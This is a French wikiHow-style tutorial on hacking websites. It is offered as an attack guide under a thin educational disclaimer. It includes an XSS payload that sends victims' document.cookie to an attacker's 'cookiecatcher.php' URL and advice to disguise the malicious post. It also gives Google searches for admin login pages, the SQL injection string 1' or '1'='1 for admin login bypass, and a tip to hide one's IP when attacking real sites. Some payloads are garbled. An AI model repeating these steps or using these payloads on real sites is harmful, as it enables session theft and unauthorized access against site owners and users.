Comment pirater un site Web

Télécharger l'article
Télécharger l'article

Note : cet article est à vocation purement pédagogique, il permet soit d’aider les gens à apprendre le piratage, soit de leur expliquer comment opèrent les hackeurs pour être ensuite capable de mieux protéger leurs sites Web. Ce tutoriel vous donne les principales étapes à réaliser en vue d’accéder aux sites Web peu sécurisés.

Méthode 1
Méthode 1 sur 3:

Utiliser le script intersites (XSS)

Télécharger l'article
  1. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/e\/e6\/Hack-a-Website-Step-1-Version-2.jpg\/v4-460px-Hack-a-Website-Step-1-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/e\/e6\/Hack-a-Website-Step-1-Version-2.jpg\/v4-728px-Hack-a-Website-Step-1-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Un forum est un bon exemple. Souvenez-vous que si le site est sécurisé, cela ne marchera pas.
  2. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/2f\/Hack-a-Website-Step-2-Version-2.jpg\/v4-460px-Hack-a-Website-Step-2-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/2f\/Hack-a-Website-Step-2-Version-2.jpg\/v4-728px-Hack-a-Website-Step-2-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Vous devrez taper des codes spéciaux qui permettront de capturer des données sensibles lorsqu’on clique dans le « post ».
    • Vous devrez tester si le système est capable de filtrer votre code. Postez
      <script>window.alert(« test »)</script>
      Si une boite d’alerte apparait lorsque vous cliquez sur votre post, cela signifie que le site est vulnérable aux attaques.
  3. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/4\/46\/Hack-a-Website-Step-3-Version-2.jpg\/v4-460px-Hack-a-Website-Step-3-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/4\/46\/Hack-a-Website-Step-3-Version-2.jpg\/v4-728px-Hack-a-Website-Step-3-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Le but de cette attaque est de capturer les cookies d’un utilisateur, ce qui vous permettra d’accéder à ses comptes de sites Web pour lesquels ses identifiants sont vulnérables. Vous aurez besoin d’un attrapeur de cookies qui permet de capturer les cookies visés et de les rediriger vers vous. Chargez l’attrapeur de cookies sur un site auquel vous avez accès et qui prend en charge le langage php.
  4. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/b\/b9\/Hack-a-Website-Step-4-Version-2.jpg\/v4-460px-Hack-a-Website-Step-4-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/b\/b9\/Hack-a-Website-Step-4-Version-2.jpg\/v4-728px-Hack-a-Website-Step-4-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Entrez un code spécifique dans le message qui servira ensuite à capturer les cookies et à les envoyer sur votre site. Vous devrez entrer quelques mots de texte après le code afin de réduire la suspicion et d’éviter que votre message soit effacé.
    • Voici un exemple de code :
      <iframe frameborder= 0 height=0 width=0src=JavaScript... : void(document.location=
      "YOURURL/cookiecatcher.php?c= » document.cookie)></iframe>
  5. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/d\/df\/Hack-a-Website-Step-5-Version-2.jpg\/v4-460px-Hack-a-Website-Step-5-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/d\/df\/Hack-a-Website-Step-5-Version-2.jpg\/v4-728px-Hack-a-Website-Step-5-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Après les avoir collectés, vous pouvez utiliser à quelques fins que ce soient les informations des cookies qui doivent être stockées dans votre site Web.
    Publicité
Méthode 2
Méthode 2 sur 3:

Exécuter une attaque par injection

Télécharger l'article
  1. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/a\/a2\/Hack-a-Website-Step-6-Version-2.jpg\/v4-460px-Hack-a-Website-Step-6-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/a\/a2\/Hack-a-Website-Step-6-Version-2.jpg\/v4-728px-Hack-a-Website-Step-6-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Vous devrez trouver un site vulnérable en sachant si l’identifiant de l’administrateur du site est facilement accessible. Essayez de faire une recherche Google sur admin login.asp.
  2. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/a\/af\/Hack-a-Website-Step-7-Version-2.jpg\/v4-460px-Hack-a-Website-Step-7-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/a\/af\/Hack-a-Website-Step-7-Version-2.jpg\/v4-728px-Hack-a-Website-Step-7-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Entrez admin en nom d’utilisateur et utilisez l’une des différentes combinaisons de mots de passe. Cela peut être n’importe quel nombre, un exemple assez commun est 1' ou '1'='1.
  3. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/5\/5b\/Hack-a-Website-Step-8-Version-2.jpg\/v4-460px-Hack-a-Website-Step-8-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/5\/5b\/Hack-a-Website-Step-8-Version-2.jpg\/v4-728px-Hack-a-Website-Step-8-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Cette manœuvre nécessitera probablement plusieurs tentatives et vous ferez forcément quelques erreurs.
  4. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/26\/Hack-a-Website-Step-9-Version-2.jpg\/v4-460px-Hack-a-Website-Step-9-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/26\/Hack-a-Website-Step-9-Version-2.jpg\/v4-728px-Hack-a-Website-Step-9-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Vous pourriez éventuellement être capable de trouver une combinaison qui vous donne un accès administrateur à un site Web, en supposant que celui-ci est vulnérable.
    Publicité
Méthode 3
Méthode 3 sur 3:

Se préparer à réussir

Télécharger l'article
  1. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/0\/00\/Hack-a-Website-Step-10-Version-2.jpg\/v4-460px-Hack-a-Website-Step-10-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/0\/00\/Hack-a-Website-Step-10-Version-2.jpg\/v4-728px-Hack-a-Website-Step-10-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Si vous voulez réellement apprendre à pirater des sites Web, vous devrez comprendre comment fonctionnent les ordinateurs et les autres technologies. Apprenez à utiliser les langages de programmation tels que Python ou SQL de façon à savoir mieux contrôler un ordinateur et identifier les vulnérabilités des systèmes.
  2. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/2f\/Hack-a-Website-Step-11-Version-2.jpg\/v4-460px-Hack-a-Website-Step-11-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/2f\/Hack-a-Website-Step-11-Version-2.jpg\/v4-728px-Hack-a-Website-Step-11-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Vous devrez également acquérir une bonne compréhension des langages HTML et JavaScript si vous souhaitez pirater des sites Web. L’apprentissage peut être long, mais il existe de nombreuses méthodes gratuites sur Internet qui vous faciliteront la tâche si vous avez la volonté de vous y mettre.
  3. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/a\/a2\/Hack-a-Website-Step-12-Version-2.jpg\/v4-460px-Hack-a-Website-Step-12-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/a\/a2\/Hack-a-Website-Step-12-Version-2.jpg\/v4-728px-Hack-a-Website-Step-12-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Ce sont des hackeurs qui utilisent leurs capacités à des fins honnêtes, principalement pour mettre en évidence les failles de sécurité sur Internet et rendre la navigation plus sure pour n’importe qui. Si vous avez envie d’apprendre l’art du piratage pour ce genre de bonne raison ou si vous voulez simplement améliorer la protection de votre site Web, il peut être une bonne idée de contacter quelques whitehats pour vous aider.
  4. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/2c\/Hack-a-Website-Step-13-Version-2.jpg\/v4-460px-Hack-a-Website-Step-13-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/2c\/Hack-a-Website-Step-13-Version-2.jpg\/v4-728px-Hack-a-Website-Step-13-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Si vous souhaitez apprendre à pirater ou si vous souhaitez simplement vous protéger, vous devrez faire beaucoup de recherches. Il y a tellement de façons différentes de trouver les failles d’un site Web que vous devrez apprendre en permanence.
  5. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/c\/ce\/Hack-a-Website-Step-14-Version-2.jpg\/v4-460px-Hack-a-Website-Step-14-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/c\/ce\/Hack-a-Website-Step-14-Version-2.jpg\/v4-728px-Hack-a-Website-Step-14-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Parce que la liste des failles potentielles est en évolution permanente, vous devrez vous assurer que vous êtes à jour sur les techniques de piratage. Le fait d’être protégé d’un certain type de hack ne signifie pas que vous serez toujours en sécurité !
    Publicité

Conseils

  • Allez sur des forums de hackeurs en vue de découvrir quelques astuces utiles.
Publicité

Avertissements

  • Si vous comptez vous essayer au piratage dans le monde réel, masquez votre adresse IP en utilisant des logiciels adaptés disponibles en ligne.
  • Le fait de lire cet article ne fait pas de vous un hackeur. Vous DEVEZ travailler vos compétences et pratiquer, pratiquer et encore pratiquer.
  • Le piratage est illégal. Si vous vous faites attraper, vous êtes en faute.
Publicité

wikiHows en relation

Comment
bloquer un site web sur votre ordinateur
Comment
changer le mot de passe WiFi (modem)
Comment
accéder à son ordinateur si on a oublié le mot de passe
Comment
ouvrir des ports d'accès au pare‐feu d'un serveur Linux
2 façons simples de réinitialiser ou changer son mot de passe de Spotify
Comment
se déconnecter de Google Play
Comment
enlever Bing de son ordinateur
Comment
réinitialiser le mot de passe administrateur sur Mac OS X
Comment
contourner un pare‑feu ou un filtre internet
Comment
copier le contenu d'un fichier PDF protégé (PC et Mac)
Comment
bloquer les sites pour adultes
Comment
protéger vos dossiers avec un mot de passe
Publicité

Références

  1. http://defencely.com/blog/10-popular-ways-hackers-hack-website/

À propos de ce wikiHow

Autres langues 
Cette page a été consultée 204 979 fois.

Cet article vous a-t-il été utile ?

Publicité